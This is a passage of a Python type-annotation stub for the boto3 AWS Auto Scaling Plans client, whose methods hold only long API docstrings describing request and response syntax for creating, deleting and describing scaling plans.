] | 119 | 2018-12-01T18:20:57.000Z | 2022-02-02T10:31:29.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/autoscaling_plans/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 15 | 2018-11-16T00:16:44.000Z | 2021-11-13T03:44:18.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/autoscaling_plans/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 11 | 2019-05-06T05:26:51.000Z | 2021-09-28T15:27:59.000Z | from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from datetime import datetime
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
def create_scaling_plan(self, ScalingPlanName: str, ApplicationSource: Dict, ScalingInstructions: List) -> Dict:
"""
Creates a scaling plan.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/autoscaling-plans-2018-01-06/CreateScalingPlan>`_
**Request Syntax**
::
response = client.create_scaling_plan(
ScalingPlanName='string',
ApplicationSource={
'CloudFormationStackARN': 'string',
'TagFilters': [
{
'Key': 'string',
'Values': [
'string',
]
},
]
},
ScalingInstructions=[
{
'ServiceNamespace': 'autoscaling'|'ecs'|'ec2'|'rds'|'dynamodb',
'ResourceId': 'string',
'ScalableDimension': 'autoscaling:autoScalingGroup:DesiredCapacity'|'ecs:service:DesiredCount'|'ec2:spot-fleet-request:TargetCapacity'|'rds:cluster:ReadReplicaCount'|'dynamodb:table:ReadCapacityUnits'|'dynamodb:table:WriteCapacityUnits'|'dynamodb:index:ReadCapacityUnits'|'dynamodb:index:WriteCapacityUnits',
'MinCapacity': 123,
'MaxCapacity': 123,
'TargetTrackingConfigurations': [
{
'PredefinedScalingMetricSpecification': {
'PredefinedScalingMetricType': 'ASGAverageCPUUtilization'|'ASGAverageNetworkIn'|'ASGAverageNetworkOut'|'DynamoDBReadCapacityUtilization'|'DynamoDBWriteCapacityUtilization'|'ECSServiceAverageCPUUtilization'|'ECSServiceAverageMemoryUtilization'|'ALBRequestCountPerTarget'|'RDSReaderAverageCPUUtilization'|'RDSReaderAverageDatabaseConnections'|'EC2SpotFleetRequestAverageCPUUtilization'|'EC2SpotFleetRequestAverageNetworkIn'|'EC2SpotFleetRequestAverageNetworkOut',
'ResourceLabel': 'string'
},
'CustomizedScalingMetricSpecification': {
'MetricName': 'string',
'Namespace': 'string',
'Dimensions': [
{
'Name': 'string',
'Value': 'string'
},
],
'Statistic': 'Average'|'Minimum'|'Maximum'|'SampleCount'|'Sum',
'Unit': 'string'
},
'TargetValue': 123.0,
'DisableScaleIn': True|False,
'ScaleOutCooldown': 123,
'ScaleInCooldown': 123,
'EstimatedInstanceWarmup': 123
},
],
'PredefinedLoadMetricSpecification': {
'PredefinedLoadMetricType': 'ASGTotalCPUUtilization'|'ASGTotalNetworkIn'|'ASGTotalNetworkOut'|'ALBTargetGroupRequestCount',
'ResourceLabel': 'string'
},
'CustomizedLoadMetricSpecification': {
'MetricName': 'string',
'Namespace': 'string',
'Dimensions': [
{
'Name': 'string',
'Value': 'string'
},
],
'Statistic': 'Average'|'Minimum'|'Maximum'|'SampleCount'|'Sum',
'Unit': 'string'
},
'ScheduledActionBufferTime': 123,
'PredictiveScalingMaxCapacityBehavior': 'SetForecastCapacityToMaxCapacity'|'SetMaxCapacityToForecastCapacity'|'SetMaxCapacityAboveForecastCapacity',
'PredictiveScalingMaxCapacityBuffer': 123,
'PredictiveScalingMode': 'ForecastAndScale'|'ForecastOnly',
'ScalingPolicyUpdateBehavior': 'KeepExternalPolicies'|'ReplaceExternalPolicies',
'DisableDynamicScaling': True|False
},
]
)
**Response Syntax**
::
{
'ScalingPlanVersion': 123
}
**Response Structure**
- *(dict) --*
- **ScalingPlanVersion** *(integer) --*
The version number of the scaling plan. This value is always 1.
Currently, you cannot specify multiple scaling plan versions.
:type ScalingPlanName: string
:param ScalingPlanName: **[REQUIRED]**
The name of the scaling plan. Names cannot contain vertical bars, colons, or forward slashes.
:type ApplicationSource: dict
:param ApplicationSource: **[REQUIRED]**
A CloudFormation stack or set of tags. You can create one scaling plan per application source.
- **CloudFormationStackARN** *(string) --*
The Amazon Resource Name (ARN) of a AWS CloudFormation stack.
- **TagFilters** *(list) --*
A set of tags (up to 50).
- *(dict) --*
Represents a tag.
- **Key** *(string) --*
The tag key.
- **Values** *(list) --*
The tag values (0 to 20).
- *(string) --*
:type ScalingInstructions: list
:param ScalingInstructions: **[REQUIRED]**
The scaling instructions.
- *(dict) --*
Describes a scaling instruction for a scalable resource.
The scaling instruction is used in combination with a scaling plan, which is a set of instructions for configuring dynamic scaling and predictive scaling for the scalable resources in your application. Each scaling instruction applies to one resource.
AWS Auto Scaling creates target tracking scaling policies based on the scaling instructions. Target tracking scaling policies adjust the capacity of your scalable resource as required to maintain resource utilization at the target value that you specified.
AWS Auto Scaling also configures predictive scaling for your Amazon EC2 Auto Scaling groups using a subset of parameters, including the load metric, the scaling metric, the target value for the scaling metric, the predictive scaling mode (forecast and scale or forecast only), and the desired behavior when the forecast capacity exceeds the maximum capacity of the resource. With predictive scaling, AWS Auto Scaling generates forecasts with traffic predictions for the two days ahead and schedules scaling actions that proactively add and remove resource capacity to match the forecast.
We recommend waiting a minimum of 24 hours after creating an Auto Scaling group to configure predictive scaling. At minimum, there must be 24 hours of historical data to generate a forecast.
For more information, see `Getting Started with AWS Auto Scaling <https://docs.aws.amazon.com/autoscaling/plans/userguide/auto-scaling-getting-started.html>`__ .
- **ServiceNamespace** *(string) --* **[REQUIRED]**
The namespace of the AWS service.
- **ResourceId** *(string) --* **[REQUIRED]**
The ID of the resource. This string consists of the resource type and unique identifier.
* Auto Scaling group - The resource type is ``autoScalingGroup`` and the unique identifier is the name of the Auto Scaling group. Example: ``autoScalingGroup/my-asg`` .
* ECS service - The resource type is ``service`` and the unique identifier is the cluster name and service name. Example: ``service/default/sample-webapp`` .
* Spot Fleet request - The resource type is ``spot-fleet-request`` and the unique identifier is the Spot Fleet request ID. Example: ``spot-fleet-request/sfr-73fbd2ce-aa30-494c-8788-1cee4EXAMPLE`` .
* DynamoDB table - The resource type is ``table`` and the unique identifier is the resource ID. Example: ``table/my-table`` .
* DynamoDB global secondary index - The resource type is ``index`` and the unique identifier is the resource ID. Example: ``table/my-table/index/my-table-index`` .
* Aurora DB cluster - The resource type is ``cluster`` and the unique identifier is the cluster name. Example: ``cluster:my-db-cluster`` .
- **ScalableDimension** *(string) --* **[REQUIRED]**
The scalable dimension associated with the resource.
* ``autoscaling:autoScalingGroup:DesiredCapacity`` - The desired capacity of an Auto Scaling group.
* ``ecs:service:DesiredCount`` - The desired task count of an ECS service.
* ``ec2:spot-fleet-request:TargetCapacity`` - The target capacity of a Spot Fleet request.
* ``dynamodb:table:ReadCapacityUnits`` - The provisioned read capacity for a DynamoDB table.
* ``dynamodb:table:WriteCapacityUnits`` - The provisioned write capacity for a DynamoDB table.
* ``dynamodb:index:ReadCapacityUnits`` - The provisioned read capacity for a DynamoDB global secondary index.
* ``dynamodb:index:WriteCapacityUnits`` - The provisioned write capacity for a DynamoDB global secondary index.
* ``rds:cluster:ReadReplicaCount`` - The count of Aurora Replicas in an Aurora DB cluster. Available for Aurora MySQL-compatible edition and Aurora PostgreSQL-compatible edition.
- **MinCapacity** *(integer) --* **[REQUIRED]**
The minimum capacity of the resource.
- **MaxCapacity** *(integer) --* **[REQUIRED]**
The maximum capacity of the resource. The exception to this upper limit is if you specify a non-default setting for **PredictiveScalingMaxCapacityBehavior** .
- **TargetTrackingConfigurations** *(list) --* **[REQUIRED]**
The structure that defines new target tracking configurations (up to 10). Each of these structures includes a specific scaling metric and a target value for the metric, along with various parameters to use with dynamic scaling.
With predictive scaling and dynamic scaling, the resource scales based on the target tracking configuration that provides the largest capacity for both scale in and scale out.
Condition: The scaling metric must be unique across target tracking configurations.
- *(dict) --*
Describes a target tracking configuration to use with AWS Auto Scaling. Used with ScalingInstruction and ScalingPolicy .
- **PredefinedScalingMetricSpecification** *(dict) --*
A predefined metric. You can specify either a predefined metric or a customized metric.
- **PredefinedScalingMetricType** *(string) --* **[REQUIRED]**
The metric type. The ``ALBRequestCountPerTarget`` metric type applies only to Auto Scaling groups, Spot Fleet requests, and ECS services.
- **ResourceLabel** *(string) --*
Identifies the resource associated with the metric type. You can\'t specify a resource label unless the metric type is ``ALBRequestCountPerTarget`` and there is a target group for an Application Load Balancer attached to the Auto Scaling group, Spot Fleet request, or ECS service.
The format is app/<load-balancer-name>/<load-balancer-id>/targetgroup/<target-group-name>/<target-group-id>, where:
* app/<load-balancer-name>/<load-balancer-id> is the final portion of the load balancer ARN.
* targetgroup/<target-group-name>/<target-group-id> is the final portion of the target group ARN.
- **CustomizedScalingMetricSpecification** *(dict) --*
A customized metric. You can specify either a predefined metric or a customized metric.
- **MetricName** *(string) --* **[REQUIRED]**
The name of the metric.
- **Namespace** *(string) --* **[REQUIRED]**
The namespace of the metric.
- **Dimensions** *(list) --*
The dimensions of the metric.
Conditional: If you published your metric with dimensions, you must specify the same dimensions in your customized scaling metric specification.
- *(dict) --*
Represents a dimension for a customized metric.
- **Name** *(string) --* **[REQUIRED]**
The name of the dimension.
- **Value** *(string) --* **[REQUIRED]**
The value of the dimension.
- **Statistic** *(string) --* **[REQUIRED]**
The statistic of the metric.
- **Unit** *(string) --*
The unit of the metric.
- **TargetValue** *(float) --* **[REQUIRED]**
The target value for the metric. The range is 8.515920e-109 to 1.174271e+108 (Base 10) or 2e-360 to 2e360 (Base 2).
- **DisableScaleIn** *(boolean) --*
Indicates whether scale in by the target tracking scaling policy is disabled. If the value is ``true`` , scale in is disabled and the target tracking scaling policy doesn\'t remove capacity from the scalable resource. Otherwise, scale in is enabled and the target tracking scaling policy can remove capacity from the scalable resource.
The default value is ``false`` .
- **ScaleOutCooldown** *(integer) --*
The amount of time, in seconds, after a scale-out activity completes before another scale-out activity can start. This value is not used if the scalable resource is an Auto Scaling group.
While the cooldown period is in effect, the capacity that has been added by the previous scale-out event that initiated the cooldown is calculated as part of the desired capacity for the next scale out. The intention is to continuously (but not excessively) scale out.
- **ScaleInCooldown** *(integer) --*
The amount of time, in seconds, after a scale in activity completes before another scale in activity can start. This value is not used if the scalable resource is an Auto Scaling group.
The cooldown period is used to block subsequent scale in requests until it has expired. The intention is to scale in conservatively to protect your application\'s availability. However, if another alarm triggers a scale-out policy during the cooldown period after a scale-in, AWS Auto Scaling scales out your scalable target immediately.
- **EstimatedInstanceWarmup** *(integer) --*
The estimated time, in seconds, until a newly launched instance can contribute to the CloudWatch metrics. This value is used only if the resource is an Auto Scaling group.
- **PredefinedLoadMetricSpecification** *(dict) --*
The predefined load metric to use for predictive scaling. This parameter or a **CustomizedLoadMetricSpecification** is required when configuring predictive scaling, and cannot be used otherwise.
- **PredefinedLoadMetricType** *(string) --* **[REQUIRED]**
The metric type.
- **ResourceLabel** *(string) --*
Identifies the resource associated with the metric type. You can\'t specify a resource label unless the metric type is ``ALBRequestCountPerTarget`` and there is a target group for an Application Load Balancer attached to the Auto Scaling group.
The format is app/<load-balancer-name>/<load-balancer-id>/targetgroup/<target-group-name>/<target-group-id>, where:
* app/<load-balancer-name>/<load-balancer-id> is the final portion of the load balancer ARN.
* targetgroup/<target-group-name>/<target-group-id> is the final portion of the target group ARN.
- **CustomizedLoadMetricSpecification** *(dict) --*
The customized load metric to use for predictive scaling. This parameter or a **PredefinedLoadMetricSpecification** is required when configuring predictive scaling, and cannot be used otherwise.
- **MetricName** *(string) --* **[REQUIRED]**
The name of the metric.
- **Namespace** *(string) --* **[REQUIRED]**
The namespace of the metric.
- **Dimensions** *(list) --*
The dimensions of the metric.
Conditional: If you published your metric with dimensions, you must specify the same dimensions in your customized load metric specification.
- *(dict) --*
Represents a dimension for a customized metric.
- **Name** *(string) --* **[REQUIRED]**
The name of the dimension.
- **Value** *(string) --* **[REQUIRED]**
The value of the dimension.
- **Statistic** *(string) --* **[REQUIRED]**
The statistic of the metric. Currently, the value must always be ``Sum`` .
- **Unit** *(string) --*
The unit of the metric.
- **ScheduledActionBufferTime** *(integer) --*
The amount of time, in seconds, to buffer the run time of scheduled scaling actions when scaling out. For example, if the forecast says to add capacity at 10:00 AM, and the buffer time is 5 minutes, then the run time of the corresponding scheduled scaling action will be 9:55 AM. The intention is to give resources time to be provisioned. For example, it can take a few minutes to launch an EC2 instance. The actual amount of time required depends on several factors, such as the size of the instance and whether there are startup scripts to complete.
The value must be less than the forecast interval duration of 3600 seconds (60 minutes). The default is 300 seconds.
Only valid when configuring predictive scaling.
- **PredictiveScalingMaxCapacityBehavior** *(string) --*
Defines the behavior that should be applied if the forecast capacity approaches or exceeds the maximum capacity specified for the resource. The default value is ``SetForecastCapacityToMaxCapacity`` .
The following are possible values:
* ``SetForecastCapacityToMaxCapacity`` - AWS Auto Scaling cannot scale resource capacity higher than the maximum capacity. The maximum capacity is enforced as a hard limit.
* ``SetMaxCapacityToForecastCapacity`` - AWS Auto Scaling may scale resource capacity higher than the maximum capacity to equal but not exceed forecast capacity.
* ``SetMaxCapacityAboveForecastCapacity`` - AWS Auto Scaling may scale resource capacity higher than the maximum capacity by a specified buffer value. The intention is to give the target tracking scaling policy extra capacity if unexpected traffic occurs.
Only valid when configuring predictive scaling.
- **PredictiveScalingMaxCapacityBuffer** *(integer) --*
The size of the capacity buffer to use when the forecast capacity is close to or exceeds the maximum capacity. The value is specified as a percentage relative to the forecast capacity. For example, if the buffer is 10, this means a 10 percent buffer, such that if the forecast capacity is 50, and the maximum capacity is 40, then the effective maximum capacity is 55.
Only valid when configuring predictive scaling. Required if the **PredictiveScalingMaxCapacityBehavior** is set to ``SetMaxCapacityAboveForecastCapacity`` , and cannot be used otherwise.
The range is 1-100.
- **PredictiveScalingMode** *(string) --*
The predictive scaling mode. The default value is ``ForecastAndScale`` . Otherwise, AWS Auto Scaling forecasts capacity but does not create any scheduled scaling actions based on the capacity forecast.
- **ScalingPolicyUpdateBehavior** *(string) --*
Controls whether a resource\'s externally created scaling policies are kept or replaced.
The default value is ``KeepExternalPolicies`` . If the parameter is set to ``ReplaceExternalPolicies`` , any scaling policies that are external to AWS Auto Scaling are deleted and new target tracking scaling policies created.
Only valid when configuring dynamic scaling.
Condition: The number of existing policies to be replaced must be less than or equal to 50. If there are more than 50 policies to be replaced, AWS Auto Scaling keeps all existing policies and does not create new ones.
- **DisableDynamicScaling** *(boolean) --*
Controls whether dynamic scaling by AWS Auto Scaling is disabled. When dynamic scaling is enabled, AWS Auto Scaling creates target tracking scaling policies based on the specified target tracking configurations.
The default is enabled (``false`` ).
:rtype: dict
:returns:
"""
pass
def delete_scaling_plan(self, ScalingPlanName: str, ScalingPlanVersion: int) -> Dict:
"""
Deletes the specified scaling plan.
Deleting a scaling plan deletes the underlying ScalingInstruction for all of the scalable resources that are covered by the plan.
If the plan has launched resources or has scaling activities in progress, you must delete those resources separately.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/autoscaling-plans-2018-01-06/DeleteScalingPlan>`_
**Request Syntax**
::
response = client.delete_scaling_plan(
ScalingPlanName='string',
ScalingPlanVersion=123
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type ScalingPlanName: string
:param ScalingPlanName: **[REQUIRED]**
The name of the scaling plan.
:type ScalingPlanVersion: integer
:param ScalingPlanVersion: **[REQUIRED]**
The version number of the scaling plan.
:rtype: dict
:returns:
"""
pass
def describe_scaling_plan_resources(self, ScalingPlanName: str, ScalingPlanVersion: int, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Describes the scalable resources in the specified scaling plan.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/autoscaling-plans-2018-01-06/DescribeScalingPlanResources>`_
**Request Syntax**
::
response = client.describe_scaling_plan_resources(
ScalingPlanName='string',
ScalingPlanVersion=123,
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'ScalingPlanResources': [
{
'ScalingPlanName': 'string',
'ScalingPlanVersion': 123,
'ServiceNamespace': 'autoscaling'|'ecs'|'ec2'|'rds'|'dynamodb',
'ResourceId': 'string',
'ScalableDimension': 'autoscaling:autoScalingGroup:DesiredCapacity'|'ecs:service:DesiredCount'|'ec2:spot-fleet-request:TargetCapacity'|'rds:cluster:ReadReplicaCount'|'dynamodb:table:ReadCapacityUnits'|'dynamodb:table:WriteCapacityUnits'|'dynamodb:index:ReadCapacityUnits'|'dynamodb:index:WriteCapacityUnits',
'ScalingPolicies': [
{
'PolicyName': 'string',
'PolicyType': 'TargetTrackingScaling',
'TargetTrackingConfiguration': {
'PredefinedScalingMetricSpecification': {
'PredefinedScalingMetricType': 'ASGAverageCPUUtilization'|'ASGAverageNetworkIn'|'ASGAverageNetworkOut'|'DynamoDBReadCapacityUtilization'|'DynamoDBWriteCapacityUtilization'|'ECSServiceAverageCPUUtilization'|'ECSServiceAverageMemoryUtilization'|'ALBRequestCountPerTarget'|'RDSReaderAverageCPUUtilization'|'RDSReaderAverageDatabaseConnections'|'EC2SpotFleetRequestAverageCPUUtilization'|'EC2SpotFleetRequestAverageNetworkIn'|'EC2SpotFleetRequestAverageNetworkOut',
'ResourceLabel': 'string'
},
'CustomizedScalingMetricSpecification': {
'MetricName': 'string',
'Namespace': 'string',
'Dimensions': [
{
'Name': 'string',
'Value': 'string'
},
],
'Statistic': 'Average'|'Minimum'|'Maximum'|'SampleCount'|'Sum',
'Unit': 'string'
},
'TargetValue': 123.0,
'DisableScaleIn': True|False,
'ScaleOutCooldown': 123,
'ScaleInCooldown': 123,
'EstimatedInstanceWarmup': 123
}
},
],
'ScalingStatusCode': 'Inactive'|'PartiallyActive'|'Active',
'ScalingStatusMessage': 'string'
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **ScalingPlanResources** *(list) --*
Information about the scalable resources.
- *(dict) --*
Represents a scalable resource.
- **ScalingPlanName** *(string) --*
The name of the scaling plan.
- **ScalingPlanVersion** *(integer) --*
The version number of the scaling plan.
- **ServiceNamespace** *(string) --*
The namespace of the AWS service.
- **ResourceId** *(string) --*
The ID of the resource. This string consists of the resource type and unique identifier.
* Auto Scaling group - The resource type is ``autoScalingGroup`` and the unique identifier is the name of the Auto Scaling group. Example: ``autoScalingGroup/my-asg`` .
* ECS service - The resource type is ``service`` and the unique identifier is the cluster name and service name. Example: ``service/default/sample-webapp`` .
* Spot Fleet request - The resource type is ``spot-fleet-request`` and the unique identifier is the Spot Fleet request ID. Example: ``spot-fleet-request/sfr-73fbd2ce-aa30-494c-8788-1cee4EXAMPLE`` .
* DynamoDB table - The resource type is ``table`` and the unique identifier is the resource ID. Example: ``table/my-table`` .
* DynamoDB global secondary index - The resource type is ``index`` and the unique identifier is the resource ID. Example: ``table/my-table/index/my-table-index`` .
* Aurora DB cluster - The resource type is ``cluster`` and the unique identifier is the cluster name. Example: ``cluster:my-db-cluster`` .
- **ScalableDimension** *(string) --*
The scalable dimension for the resource.
* ``autoscaling:autoScalingGroup:DesiredCapacity`` - The desired capacity of an Auto Scaling group.
* ``ecs:service:DesiredCount`` - The desired task count of an ECS service.
* ``ec2:spot-fleet-request:TargetCapacity`` - The target capacity of a Spot Fleet request.
* ``dynamodb:table:ReadCapacityUnits`` - The provisioned read capacity for a DynamoDB table.
* ``dynamodb:table:WriteCapacityUnits`` - The provisioned write capacity for a DynamoDB table.
* ``dynamodb:index:ReadCapacityUnits`` - The provisioned read capacity for a DynamoDB global secondary index.
* ``dynamodb:index:WriteCapacityUnits`` - The provisioned write capacity for a DynamoDB global secondary index.
* ``rds:cluster:ReadReplicaCount`` - The count of Aurora Replicas in an Aurora DB cluster. Available for Aurora MySQL-compatible edition and Aurora PostgreSQL-compatible edition.
- **ScalingPolicies** *(list) --*
The scaling policies.
- *(dict) --*
Represents a scaling policy.
- **PolicyName** *(string) --*
The name of the scaling policy.
- **PolicyType** *(string) --*
The type of scaling policy.
- **TargetTrackingConfiguration** *(dict) --*
The target tracking scaling policy. Includes support for predefined or customized metrics.
- **PredefinedScalingMetricSpecification** *(dict) --*
A predefined metric. You can specify either a predefined metric or a customized metric.
- **PredefinedScalingMetricType** *(string) --*
The metric type. The ``ALBRequestCountPerTarget`` metric type applies only to Auto Scaling groups, Spot Fleet requests, and ECS services.
- **ResourceLabel** *(string) --*
Identifies the resource associated with the metric type. You can't specify a resource label unless the metric type is ``ALBRequestCountPerTarget`` and there is a target group for an Application Load Balancer attached to the Auto Scaling group, Spot Fleet request, or ECS service.
The format is app/<load-balancer-name>/<load-balancer-id>/targetgroup/<target-group-name>/<target-group-id>, where:
* app/<load-balancer-name>/<load-balancer-id> is the final portion of the load balancer ARN.
* targetgroup/<target-group-name>/<target-group-id> is the final portion of the target group ARN.
- **CustomizedScalingMetricSpecification** *(dict) --*
A customized metric. You can specify either a predefined metric or a customized metric.
- **MetricName** *(string) --*
The name of the metric.
- **Namespace** *(string) --*
The namespace of the metric.
- **Dimensions** *(list) --*
The dimensions of the metric.
Conditional: If you published your metric with dimensions, you must specify the same dimensions in your customized scaling metric specification.
- *(dict) --*
Represents a dimension for a customized metric.
- **Name** *(string) --*
The name of the dimension.
- **Value** *(string) --*
The value of the dimension.
- **Statistic** *(string) --*
The statistic of the metric.
- **Unit** *(string) --*
The unit of the metric.
- **TargetValue** *(float) --*
The target value for the metric. The range is 8.515920e-109 to 1.174271e+108 (Base 10) or 2e-360 to 2e360 (Base 2).
- **DisableScaleIn** *(boolean) --*
Indicates whether scale in by the target tracking scaling policy is disabled. If the value is ``true`` , scale in is disabled and the target tracking scaling policy doesn't remove capacity from the scalable resource. Otherwise, scale in is enabled and the target tracking scaling policy can remove capacity from the scalable resource.
The default value is ``false`` .
- **ScaleOutCooldown** *(integer) --*
The amount of time, in seconds, after a scale-out activity completes before another scale-out activity can start. This value is not used if the scalable resource is an Auto Scaling group.
While the cooldown period is in effect, the capacity that has been added by the previous scale-out event that initiated the cooldown is calculated as part of the desired capacity for the next scale out. The intention is to continuously (but not excessively) scale out.
- **ScaleInCooldown** *(integer) --*
The amount of time, in seconds, after a scale in activity completes before another scale in activity can start. This value is not used if the scalable resource is an Auto Scaling group.
The cooldown period is used to block subsequent scale in requests until it has expired. The intention is to scale in conservatively to protect your application's availability. However, if another alarm triggers a scale-out policy during the cooldown period after a scale-in, AWS Auto Scaling scales out your scalable target immediately.
- **EstimatedInstanceWarmup** *(integer) --*
The estimated time, in seconds, until a newly launched instance can contribute to the CloudWatch metrics. This value is used only if the resource is an Auto Scaling group.
- **ScalingStatusCode** *(string) --*
The scaling status of the resource.
* ``Active`` - The scaling configuration is active.
* ``Inactive`` - The scaling configuration is not active because the scaling plan is being created or the scaling configuration could not be applied. Check the status message for more information.
* ``PartiallyActive`` - The scaling configuration is partially active because the scaling plan is being created or deleted or the scaling configuration could not be fully applied. Check the status message for more information.
- **ScalingStatusMessage** *(string) --*
A simple message about the current scaling status of the resource.
- **NextToken** *(string) --*
The token required to get the next set of results. This value is ``null`` if there are no more results to return.
:type ScalingPlanName: string
:param ScalingPlanName: **[REQUIRED]**
The name of the scaling plan.
:type ScalingPlanVersion: integer
:param ScalingPlanVersion: **[REQUIRED]**
The version number of the scaling plan.
:type MaxResults: integer
:param MaxResults:
The maximum number of scalable resources to return. The value must be between 1 and 50. The default value is 50.
:type NextToken: string
:param NextToken:
The token for the next set of results.
:rtype: dict
:returns:
"""
pass
def describe_scaling_plans(self, ScalingPlanNames: List = None, ScalingPlanVersion: int = None, ApplicationSources: List = None, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Describes one or more of your scaling plans.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/autoscaling-plans-2018-01-06/DescribeScalingPlans>`_
**Request Syntax**
::
response = client.describe_scaling_plans(
ScalingPlanNames=[
'string',
],
ScalingPlanVersion=123,
ApplicationSources=[
{
'CloudFormationStackARN': 'string',
'TagFilters': [
{
'Key': 'string',
'Values': [
'string',
]
},
]
},
],
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'ScalingPlans': [
{
'ScalingPlanName': 'string',
'ScalingPlanVersion': 123,
'ApplicationSource': {
'CloudFormationStackARN': 'string',
'TagFilters': [
{
'Key': 'string',
'Values': [
'string',
]
},
]
},
'ScalingInstructions': [
{
'ServiceNamespace': 'autoscaling'|'ecs'|'ec2'|'rds'|'dynamodb',
'ResourceId': 'string',
'ScalableDimension': 'autoscaling:autoScalingGroup:DesiredCapacity'|'ecs:service:DesiredCount'|'ec2:spot-fleet-request:TargetCapacity'|'rds:cluster:ReadReplicaCount'|'dynamodb:table:ReadCapacityUnits'|'dynamodb:table:WriteCapacityUnits'|'dynamodb:index:ReadCapacityUnits'|'dynamodb:index:WriteCapacityUnits',
'MinCapacity': 123,
'MaxCapacity': 123,
'TargetTrackingConfigurations': [
{
'PredefinedScalingMetricSpecification': {
'PredefinedScalingMetricType': 'ASGAverageCPUUtilization'|'ASGAverageNetworkIn'|'ASGAverageNetworkOut'|'DynamoDBReadCapacityUtilization'|'DynamoDBWriteCapacityUtilization'|'ECSServiceAverageCPUUtilization'|'ECSServiceAverageMemoryUtilization'|'ALBRequestCountPerTarget'|'RDSReaderAverageCPUUtilization'|'RDSReaderAverageDatabaseConnections'|'EC2SpotFleetRequestAverageCPUUtilization'|'EC2SpotFleetRequestAverageNetworkIn'|'EC2SpotFleetRequestAverageNetworkOut',
'ResourceLabel': 'string'
},
'CustomizedScalingMetricSpecification': {
'MetricName': 'string',
'Namespace': 'string',
'Dimensions': [
{
'Name': 'string',
'Value': 'string'
},
],
'Statistic': 'Average'|'Minimum'|'Maximum'|'SampleCount'|'Sum',
'Unit': 'string'
},
'TargetValue': 123.0,
'DisableScaleIn': True|False,
'ScaleOutCooldown': 123,
'ScaleInCooldown': 123,
'EstimatedInstanceWarmup': 123
},
],
'PredefinedLoadMetricSpecification': {
'PredefinedLoadMetricType': 'ASGTotalCPUUtilization'|'ASGTotalNetworkIn'|'ASGTotalNetworkOut'|'ALBTargetGroupRequestCount',
'ResourceLabel': 'string'
},
'CustomizedLoadMetricSpecification': {
'MetricName': 'string',
'Namespace': 'string',
'Dimensions': [
{
'Name': 'string',
'Value': 'string'
},
],
'Statistic': 'Average'|'Minimum'|'Maximum'|'SampleCount'|'Sum',
'Unit': 'string'
},
'ScheduledActionBufferTime': 123,
'PredictiveScalingMaxCapacityBehavior': 'SetForecastCapacityToMaxCapacity'|'SetMaxCapacityToForecastCapacity'|'SetMaxCapacityAboveForecastCapacity',
'PredictiveScalingMaxCapacityBuffer': 123,
'PredictiveScalingMode': 'ForecastAndScale'|'ForecastOnly',
'ScalingPolicyUpdateBehavior': 'KeepExternalPolicies'|'ReplaceExternalPolicies',
'DisableDynamicScaling': True|False
},
],
'StatusCode': 'Active'|'ActiveWithProblems'|'CreationInProgress'|'CreationFailed'|'DeletionInProgress'|'DeletionFailed'|'UpdateInProgress'|'UpdateFailed',
'StatusMessage': 'string',
'StatusStartTime': datetime(2015, 1, 1),
'CreationTime': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **ScalingPlans** *(list) --*
Information about the scaling plans.
- *(dict) --*
Represents a scaling plan.
- **ScalingPlanName** *(string) --*
The name of the scaling plan.
- **ScalingPlanVersion** *(integer) --*
The version number of the scaling plan.
- **ApplicationSource** *(dict) --*
The application source.
- **CloudFormationStackARN** *(string) --*
The Amazon Resource Name (ARN) of a AWS CloudFormation stack.
- **TagFilters** *(list) --*
A set of tags (up to 50).
- *(dict) --*
Represents a tag.
- **Key** *(string) --*
The tag key.
- **Values** *(list) --*
The tag values (0 to 20).
- *(string) --*
- **ScalingInstructions** *(list) --*
The scaling instructions.
- *(dict) --*
Describes a scaling instruction for a scalable resource.
The scaling instruction is used in combination with a scaling plan, which is a set of instructions for configuring dynamic scaling and predictive scaling for the scalable resources in your application. Each scaling instruction applies to one resource.
AWS Auto Scaling creates target tracking scaling policies based on the scaling instructions. Target tracking scaling policies adjust the capacity of your scalable resource as required to maintain resource utilization at the target value that you specified.
AWS Auto Scaling also configures predictive scaling for your Amazon EC2 Auto Scaling groups using a subset of parameters, including the load metric, the scaling metric, the target value for the scaling metric, the predictive scaling mode (forecast and scale or forecast only), and the desired behavior when the forecast capacity exceeds the maximum capacity of the resource. With predictive scaling, AWS Auto Scaling generates forecasts with traffic predictions for the two days ahead and schedules scaling actions that proactively add and remove resource capacity to match the forecast.
We recommend waiting a minimum of 24 hours after creating an Auto Scaling group to configure predictive scaling. At minimum, there must be 24 hours of historical data to generate a forecast.
For more information, see `Getting Started with AWS Auto Scaling <https://docs.aws.amazon.com/autoscaling/plans/userguide/auto-scaling-getting-started.html>`__ .
- **ServiceNamespace** *(string) --*
The namespace of the AWS service.
- **ResourceId** *(string) --*
The ID of the resource. This string consists of the resource type and unique identifier.
* Auto Scaling group - The resource type is ``autoScalingGroup`` and the unique identifier is the name of the Auto Scaling group. Example: ``autoScalingGroup/my-asg`` .
* ECS service - The resource type is ``service`` and the unique identifier is the cluster name and service name. Example: ``service/default/sample-webapp`` .
